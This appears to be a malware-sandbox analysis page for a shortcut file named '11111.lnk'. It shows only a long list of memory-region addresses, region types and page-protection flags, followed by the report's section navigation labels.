2365B25D000

trusted library allocation

page read and write

2365B22D000

trusted library allocation

page read and write

2366A78F000

trusted library allocation

page read and write

2365AC84000

trusted library allocation

page read and write

1C44DB3E000

heap

page read and write

1C435860000

trusted library allocation

page read and write

2365AD06000

trusted library allocation

page read and write

23672BF2000

heap

page read and write

18699402000

heap

page read and write

7FFD34794000

trusted library allocation

page read and write

2365C067000

trusted library allocation

page read and write

7FFD347EC000

trusted library allocation

page execute and read and write

7FFD34A00000

trusted library allocation

page read and write

7FFD34A90000

trusted library allocation

page read and write

1C44DB13000

heap

page read and write

1C4375F3000

trusted library allocation

page read and write

7FFD34A75000

trusted library allocation

page read and write

23658AAC000

heap

page read and write

1C437799000

trusted library allocation

page read and write

7FFD34A10000

trusted library allocation

page read and write

7FFD34B58000

trusted library allocation

page read and write

2366A771000

trusted library allocation

page read and write

7FFD349B0000

trusted library allocation

page read and write

1C44DF60000

trusted library allocation

page read and write

7FFD34AE0000

trusted library allocation

page read and write

23672BBC000

heap

page read and write

7FFD349A0000

trusted library allocation

page read and write

7FFD34AC0000

trusted library allocation

page read and write

1C44DB62000

heap

page read and write

5406AFE000

stack

page read and write

18699940000

trusted library allocation

page read and write

1869E410000

trusted library allocation

page read and write

1C4354B0000

heap

page readonly

7FFD34C00000

trusted library allocation

page read and write

7FFD34AA0000

trusted library allocation

page read and write

1C445990000

trusted library allocation

page read and write

7DF46CF30000

trusted library allocation

page execute and read and write

23672B90000

heap

page execute and read and write

7FFD34B00000

trusted library allocation

page read and write

23672A80000

heap

page read and write

8F72D3B000

stack

page read and write

1C437315000

trusted library allocation

page read and write

7FFD34B30000

trusted library allocation

page read and write

1C44DB66000

heap

page read and write

7FFD34972000

trusted library allocation

page read and write

54059FE000

stack

page read and write

7FFD3484C000

trusted library allocation

page execute and read and write

7FFD34C64000

trusted library allocation

page read and write

7FFD34B49000

trusted library allocation

page read and write

7FFD34BD0000

trusted library allocation

page read and write

1C445D59000

trusted library allocation

page read and write

1869E200000

heap

page read and write

5406FF9000

stack

page read and write

2365AC8E000

trusted library allocation

page read and write

18698C8D000

heap

page read and write

2365B6A1000

trusted library allocation

page read and write

2366A9E2000

trusted library allocation

page read and write

540697E000

stack

page read and write

1C435961000

trusted library allocation

page read and write

7FFD34C4E000

trusted library allocation

page read and write

7FFD34960000

trusted library allocation

page execute and read and write

1C433B23000

heap

page read and write

18698C2B000

heap

page read and write

54060FE000

unkown

page readonly

8F7267E000

stack

page read and write

23672BB0000

heap

page read and write

1C4364FC000

trusted library allocation

page read and write

1869E460000

remote allocation

page read and write

36C73FE000

stack

page read and write

7FFD349F0000

trusted library allocation

page read and write

54070FE000

unkown

page readonly

7FFD349B0000

trusted library allocation

page read and write

7FFD34C68000

trusted library allocation

page read and write

1869E310000

heap

page read and write

7FFD34C00000

trusted library allocation

page read and write

8F7388B000

stack

page read and write

18699CB0000

trusted library section

page readonly

2365B05A000

trusted library allocation

page read and write

1C4359EB000

trusted library allocation

page read and write

2365AD02000

trusted library allocation

page read and write

7FFD34B39000

trusted library allocation

page read and write

1C44DEEA000

heap

page read and write

1C44DEF5000

heap

page read and write

7FFD349E0000

trusted library allocation

page read and write

1869A030000

trusted library allocation

page read and write

7FFD34B40000

trusted library allocation

page read and write

23658A23000

heap

page read and write

7FFD34C70000

trusted library allocation

page read and write

1C433CE5000

heap

page read and write

1C4361E2000

trusted library allocation

page read and write

7FFD34AF0000

trusted library allocation

page read and write

7FFD34B50000

trusted library allocation

page read and write

1C437948000

trusted library allocation

page read and write

2366A786000

trusted library allocation

page read and write

2365B392000

trusted library allocation

page read and write

18698CB4000

heap

page read and write

5405FFA000

stack

page read and write

2365A99A000

trusted library allocation

page read and write

1C44DDC1000

heap

page read and write

1C43676B000

trusted library allocation

page read and write

2365C03F000

trusted library allocation

page read and write

23658A1B000

heap

page read and write

1C44DEFA000

heap

page read and write

7FFD34941000

trusted library allocation

page read and write

36C75B8000

stack

page read and write

23672CCA000

heap

page read and write

8F72CBE000

stack

page read and write

5406CFE000

unkown

page readonly

1C436487000

trusted library allocation

page read and write

1C445BD1000

trusted library allocation

page read and write

7FFD349C0000

trusted library allocation

page read and write

2365ACDE000

trusted library allocation

page read and write

18699502000

heap

page read and write

7DF4501D0000

trusted library allocation

page execute and read and write

54062FE000

unkown

page readonly

7FFD34AA0000

trusted library allocation

page read and write

1869951A000

heap

page read and write

7FFD34794000

trusted library allocation

page read and write

7FFD3479D000

trusted library allocation

page execute and read and write

1C44DC3E000

heap

page read and write

1C436FDA000

trusted library allocation

page read and write

1C445976000

trusted library allocation

page read and write

7FFD34876000

trusted library allocation

page execute and read and write

2365B229000

trusted library allocation

page read and write

7FFD34876000

trusted library allocation

page execute and read and write

23672D58000

heap

page read and write

1C44DECC000

heap

page read and write

8F72BBE000

stack

page read and write

7DF4501E0000

trusted library allocation

page execute and read and write

54064FE000

unkown

page readonly

1C433B1C000

heap

page read and write

2365BEE4000

trusted library allocation

page read and write

18699270000

trusted library allocation

page read and write

1869E11E000

trusted library allocation

page read and write

2365AD1A000

trusted library allocation

page read and write

7FFD34A20000

trusted library allocation

page read and write

236728D0000

heap

page read and write

1C44DD30000

heap

page read and write

1C4366A3000

trusted library allocation

page read and write

2365A690000

heap

page readonly

236589D0000

heap

page read and write

1C43796E000

trusted library allocation

page read and write

1869E190000

trusted library allocation

page read and write

2365BF9F000

trusted library allocation

page read and write

23672A57000

heap

page execute and read and write

236589DB000

heap

page read and write

7FFD34A60000

trusted library allocation

page read and write

7FFD34B13000

trusted library allocation

page read and write

7FFD34AC0000

trusted library allocation

page read and write

5405CFE000

unkown

page readonly

7FFD34A84000

trusted library allocation

page read and write

23672DA8000

heap

page read and write

7FFD34A40000

trusted library allocation

page read and write

7FFD34B44000

trusted library allocation

page read and write

36C763A000

stack

page read and write

7FFD34C64000

trusted library allocation

page read and write

5405EFE000

unkown

page readonly

1C436054000

trusted library allocation

page read and write

1C44DE0F000

heap

page read and write

23672DF0000

trusted library allocation

page read and write

1C43606F000

trusted library allocation

page read and write

36C77BE000

stack

page read and write

36C70FE000

stack

page read and write

1869E460000

remote allocation

page read and write

1869E2ED000

heap

page read and write

36C74BF000

stack

page read and write

54076FE000

unkown

page readonly

1869E2FB000

heap

page read and write

8F723EE000

stack

page read and write

236588E0000

heap

page read and write

8F72C3C000

stack

page read and write

2365AD16000

trusted library allocation

page read and write

23672AB6000

heap

page read and write

1C435950000

heap

page read and write

18699C90000

trusted library section

page readonly

7FFD34BF0000

trusted library allocation

page read and write

1C43728C000

trusted library allocation

page read and write

2367277D000

heap

page read and write

1869E2CE000

heap

page read and write

1C4364C9000

trusted library allocation

page read and write

1C433A50000

heap

page read and write

1869E291000

heap

page read and write

2367311F000

heap

page read and write

8F726F9000

stack

page read and write

7FFD34B50000

trusted library allocation

page read and write

7FFD34B10000

trusted library allocation

page read and write

23672D2F000

heap

page read and write

18698C7C000

heap

page read and write

1C44D96C000

heap

page read and write

7FFD34846000

trusted library allocation

page read and write

5405DFC000

stack

page read and write

1869E030000

trusted library allocation

page read and write

7FFD34B5C000

trusted library allocation

page read and write

36C71FE000

stack

page read and write

1C433A60000

heap

page read and write

2365B67B000

trusted library allocation

page read and write

7FFD34C09000

trusted library allocation

page read and write

1C436EF8000

trusted library allocation

page read and write

2365B05D000

trusted library allocation

page read and write

8F7390D000

stack

page read and write

1869E30B000

heap

page read and write

18699691000

trusted library allocation

page read and write

36C737D000

stack

page read and write

1C436213000

trusted library allocation

page read and write

1C44DC57000

heap

page read and write

1869E400000

trusted library allocation

page read and write

7FFD34AE0000

trusted library allocation

page read and write

1C44DD10000

heap

page execute and read and write

18699400000

heap

page read and write

23672CA8000

heap

page read and write

7FFD34C20000

trusted library allocation

page read and write

8F722E3000

stack

page read and write

5405BFB000

stack

page read and write

36C830C000

stack

page read and write

23672948000

heap

page read and write

23673116000

heap

page read and write

18699C60000

trusted library section

page readonly

1869E1F0000

trusted library allocation

page read and write

7FFD34790000

trusted library allocation

page read and write

23672CEB000

heap

page read and write

2365A6C0000

heap

page read and write

1869E190000

trusted library allocation

page read and write

1C44DD44000

heap

page read and write

18699415000

heap

page read and write

7FFD34C62000

trusted library allocation

page read and write

7FFD34AB0000

trusted library allocation

page read and write

1C44DF02000

heap

page read and write

2365C7CD000

trusted library allocation

page read and write

1C436576000

trusted library allocation

page read and write

23658A35000

heap

page read and write

8F7277E000

stack

page read and write

7FFD34990000

trusted library allocation

page read and write

1869E0F0000

trusted library allocation

page read and write

1C44DB10000

heap

page read and write

2365B071000

trusted library allocation

page read and write

1C43660B000

trusted library allocation

page read and write

23672FB0000

heap

page read and write

1C436AAB000

trusted library allocation

page read and write

1C44DDEC000

heap

page read and write

1869E0C0000

trusted library allocation

page read and write

7FFD34C40000

trusted library allocation

page read and write

23658AA0000

heap

page read and write

36C7537000

stack

page read and write

8F72B3E000

stack

page read and write

1C437856000

trusted library allocation

page read and write

1C44DE35000

heap

page read and write

1869E221000

heap

page read and write

7FFD34C4B000

trusted library allocation

page read and write

7FFD349E0000

trusted library allocation

page read and write

2365B1D0000

trusted library allocation

page read and write

2365B9DE000

trusted library allocation

page read and write

8F72A38000

stack

page read and write

2365A2E4000

heap

page read and write

7FFD347A0000

trusted library allocation

page read and write

7FFD34A80000

trusted library allocation

page read and write

1869E2C6000

heap

page read and write

7FFD34846000

trusted library allocation

page read and write

7FFD34A30000

trusted library allocation

page read and write

7FFD34950000

trusted library allocation

page execute and read and write

1C4354E4000

heap

page read and write

7FFD347EC000

trusted library allocation

page execute and read and write

23658AD0000

heap

page read and write

540637E000

stack

page read and write

1C433AA7000

heap

page read and write

2365C381000

trusted library allocation

page read and write

8F729B6000

stack

page read and write

1C44DD73000

heap

page read and write

2365ACF4000

trusted library allocation

page read and write

540657E000

stack

page read and write

7FFD34C42000

trusted library allocation

page read and write

23672AA5000

heap

page read and write

7FFD34B20000

trusted library allocation

page read and write

7FFD34AD0000

trusted library allocation

page read and write

36C727A000

stack

page read and write

2365A6D0000

trusted library allocation

page read and write

5406BFE000

unkown

page readonly

2365B589000

trusted library allocation

page read and write

1C43646C000

trusted library allocation

page read and write

18698C22000

heap

page read and write

7FFD34A90000

trusted library allocation

page read and write

2365A760000

heap

page execute and read and write

36C76BE000

stack

page read and write

1C433AE1000

heap

page read and write

7DF46CF40000

trusted library allocation

page execute and read and write

1C435B8A000

trusted library allocation

page read and write

236589E8000

heap

page read and write

1C4362F2000

trusted library allocation

page read and write

2365BF62000

trusted library allocation

page read and write

7FFD34793000

trusted library allocation

page execute and read and write

36C840B000

stack

page read and write

7FFD34B23000

trusted library allocation

page read and write

1869F000000

heap

page read and write

7FFD34932000

trusted library allocation

page read and write

7FFD347A0000

trusted library allocation

page read and write

8F7378E000

stack

page read and write

2365AD18000

trusted library allocation

page read and write

1C44DC30000

heap

page read and write

7FFD34BE3000

trusted library allocation

page read and write

1C44DE9B000

heap

page read and write

7FFD34B40000

trusted library allocation

page read and write

1869E0A0000

trusted library allocation

page read and write

7FFD3484C000

trusted library allocation

page execute and read and write

2365A776000

trusted library allocation

page read and write

7FFD34AD0000

trusted library allocation

page read and write

1C44DB00000

heap

page execute and read and write

2365B839000

trusted library allocation

page read and write

7DF46CF50000

trusted library allocation

page execute and read and write

1869A001000

trusted library allocation

page read and write

1869E242000

heap

page read and write

7FFD34BF0000

trusted library allocation

page read and write

18698C94000

heap

page read and write

7FFD34840000

trusted library allocation

page read and write

18698C78000

heap

page read and write

7FFD34C66000

trusted library allocation

page read and write

7FFD34B34000

trusted library allocation

page read and write

1869E0C1000

trusted library allocation

page read and write

1C436050000

trusted library allocation

page read and write

36C783F000

stack

page read and write

1C433A9B000

heap

page read and write

1C4378A5000

trusted library allocation

page read and write

1C44DB5F000

heap

page read and write

7FFD34B10000

trusted library allocation

page read and write

540677E000

stack

page read and write

7FFD34972000

trusted library allocation

page read and write

23658CA4000

heap

page read and write

7FFD3494A000

trusted library allocation

page read and write

1869E313000

heap

page read and write

2365B5D8000

trusted library allocation

page read and write

1C445C57000

trusted library allocation

page read and write

8F7236E000

stack

page read and write

7FFD34A70000

trusted library allocation

page read and write

7FFD34BD3000

trusted library allocation

page read and write

54067FE000

unkown

page readonly

1869E2C8000

heap

page read and write

23673110000

heap

page read and write

7FFD34A80000

trusted library allocation

page read and write

1C433AD5000

heap

page read and write

7FFD3479D000

trusted library allocation

page execute and read and write

7FFD34960000

trusted library allocation

page execute and read and write

18698C5B000

heap

page read and write

1C4354E0000

heap

page read and write

2365AD12000

trusted library allocation

page read and write

1869E040000

trusted library allocation

page read and write

18699C70000

trusted library section

page readonly

1869E2F6000

heap

page read and write

7FFD348B0000

trusted library allocation

page execute and read and write

18699B80000

trusted library allocation

page read and write

2365ACE2000

trusted library allocation

page read and write

23672880000

heap

page read and write

2365A680000

trusted library allocation

page read and write

2365B389000

trusted library allocation

page read and write

36C717E000

stack

page read and write

8F72AB9000

stack

page read and write

1869E2F1000

heap

page read and write

1C436793000

trusted library allocation

page read and write

7FFD34B52000

trusted library allocation

page read and write

2365ACE6000

trusted library allocation

page read and write

23658A15000

heap

page read and write

1869E24F000

heap

page read and write

2365A6A0000

trusted library allocation

page read and write

236589FD000

heap

page read and write

7FFD34B00000

trusted library allocation

page read and write

2365A700000

trusted library allocation

page read and write

236728E5000

heap

page read and write

2365C0BA000

trusted library allocation

page read and write

7FFD34980000

trusted library allocation

page execute and read and write

1C433AF5000

heap

page read and write

18698D13000

heap

page read and write

7FFD34A50000

trusted library allocation

page read and write

540687E000

stack

page read and write

236728C6000

heap

page read and write

7FFD34C10000

trusted library allocation

page execute and read and write

18698C7A000

heap

page read and write

1C44DBD8000

heap

page read and write

7FFD34840000

trusted library allocation

page read and write

2365B084000

trusted library allocation

page read and write

18699CA0000

trusted library section

page readonly

23672A50000

heap

page execute and read and write

7FFD34B4C000

trusted library allocation

page read and write

7FFD34930000

trusted library allocation

page read and write

1C44DD40000

heap

page read and write

54057F7000

stack

page read and write

1869E2E5000

heap

page read and write

36C773E000

stack

page read and write

5406C7E000

stack

page read and write

2365B080000

trusted library allocation

page read and write

2365AD1E000

trusted library allocation

page read and write

1C436045000

trusted library allocation

page read and write

1C436031000

trusted library allocation

page read and write

2365B2B8000

trusted library allocation

page read and write

18698C72000

heap

page read and write

7FFD347AB000

trusted library allocation

page read and write

540647E000

stack

page read and write

1C433AD7000

heap

page read and write

1C44DB58000

heap

page read and write

23672AA0000

heap

page read and write

2366A7A0000

trusted library allocation

page read and write

1C4378FA000

trusted library allocation

page read and write

18699500000

heap

page read and write

7FFD347AB000

trusted library allocation

page read and write

2365B07C000

trusted library allocation

page read and write

2365B62D000

trusted library allocation

page read and write

7FFD34B48000

trusted library allocation

page read and write

1869E302000

heap

page read and write

54058FE000

unkown

page readonly

1869E0B0000

trusted library allocation

page read and write

1869E254000

heap

page read and write

1C4459CE000

trusted library allocation

page read and write

1869951A000

heap

page read and write

36C78BB000

stack

page read and write

2365B097000

trusted library allocation

page read and write

8F7370E000

stack

page read and write

18699513000

heap

page read and write

2365B1EB000

trusted library allocation

page read and write

23658A7B000

heap

page read and write

18699C80000

trusted library section

page readonly

7FFD3494A000

trusted library allocation

page read and write

1869E100000

trusted library allocation

page read and write

2365AD00000

trusted library allocation

page read and write

2366A788000

trusted library allocation

page read and write

36C838E000

stack

page read and write

1869E2E7000

heap

page read and write

18698BE0000

heap

page read and write

7FFD34BE0000

trusted library allocation

page read and write

7FFD34C70000

trusted library allocation

page read and write

23658CA0000

heap

page read and write

7FFD34BE0000

trusted library allocation

page read and write

36C848D000

stack

page read and write

7FFD34C62000

trusted library allocation

page read and write

8F7287E000

stack

page read and write

36C828E000

stack

page read and write

18698CBD000

heap

page read and write

5406EFE000

unkown

page readonly

1869E2F3000

heap

page read and write

1C437907000

trusted library allocation

page read and write

54069FE000

unkown

page readonly

2365ACDC000

trusted library allocation

page read and write

7FFD34793000

trusted library allocation

page execute and read and write

23673100000

heap

page read and write

1C4354C0000

trusted library allocation

page read and write

1869E104000

trusted library allocation

page read and write

1C44DC43000

heap

page read and write

1C433A90000

heap

page read and write

1869E1A0000

trusted library allocation

page read and write

1C4365CF000

trusted library allocation

page read and write

54068FE000

unkown

page readonly

1C44DC39000

heap

page read and write

36C72FE000

stack

page read and write

1C433ADB000

heap

page read and write

18698B00000

heap

page read and write

18698D29000

heap

page read and write

18698CFF000

heap

page read and write

540547B000

stack

page read and write

5405AFE000

unkown

page readonly

1C44DD98000

heap

page read and write

36C6DD3000

stack

page read and write

1869E210000

trusted library allocation

page read and write

2365ACF6000

trusted library allocation

page read and write

1C4375CD000

trusted library allocation

page read and write

7FFD34C45000

trusted library allocation

page read and write

1C4378ED000

trusted library allocation

page read and write

1C445961000

trusted library allocation

page read and write

2365B312000

trusted library allocation

page read and write

1869E300000

heap

page read and write

54065FE000

unkown

page readonly

18698C9F000

heap

page read and write

2365B620000

trusted library allocation

page read and write

1869E0E0000

trusted library allocation

page read and write

1C4364C5000

trusted library allocation

page read and write

7FFD34790000

trusted library allocation

page read and write

7FFD34C09000

trusted library allocation

page read and write

7FFD34AB0000

trusted library allocation

page read and write

8F7380E000

stack

page read and write

23672D34000

heap

page read and write

1869E0C0000

trusted library allocation

page read and write

1C44DDC3000

heap

page read and write

23658AF0000

heap

page read and write

18698C00000

heap

page read and write

7FFD349D0000

trusted library allocation

page read and write

1C433CE0000

heap

page read and write

2365B63A000

trusted library allocation

page read and write

2365C8AF000

trusted library allocation

page read and write

23672C11000

heap

page read and write

1869E460000

remote allocation

page read and write

2365ABD0000

trusted library allocation

page read and write

2365AD22000

trusted library allocation

page read and write

8F728F8000

stack

page read and write

2365AD0A000

trusted library allocation

page read and write

1C43664E000

trusted library allocation

page read and write

2365B561000

trusted library allocation

page read and write

18698CAF000

heap

page read and write

1C43782E000

trusted library allocation

page read and write

23672D04000

heap

page read and write

1C43602E000

trusted library allocation

page read and write

18698C41000

heap

page read and write

1869E265000

heap

page read and write

7FFD34A20000

trusted library allocation

page read and write

23658A5B000

heap

page read and write

7FFD34990000

trusted library allocation

page read and write

There are 550 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
11111.lnk

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report11111.lnk

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

IOC Report
11111.lnk